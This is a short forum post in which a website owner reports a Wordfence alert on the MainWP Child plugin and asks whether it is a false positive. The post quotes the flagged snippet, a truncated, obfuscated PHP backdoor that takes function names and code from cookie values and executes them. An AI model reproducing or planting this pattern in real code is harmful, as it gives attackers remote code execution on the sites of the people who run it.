Hi,
I received a Wordfence malware alert in one of my websites, regarding a Backdoor:PHP/reval.C.3102 script in wp-content/plugins/mainwp-child/mainwp-child.php file
Details:
The matched text in this file is:
$p = $_COOKIE;\x0d\x0a(count($p) == 8)?(($um = $p[59].$p[68]) && ($bk = $um($p[95].$p[75])) && ($_bk = $um($p[16].$p[38])) && ($_bk = $bk($p[43], $_bk($um($p[20])))) && @$_bk(
Is this real malware or a false positive?
Regards,
Roberto Jobet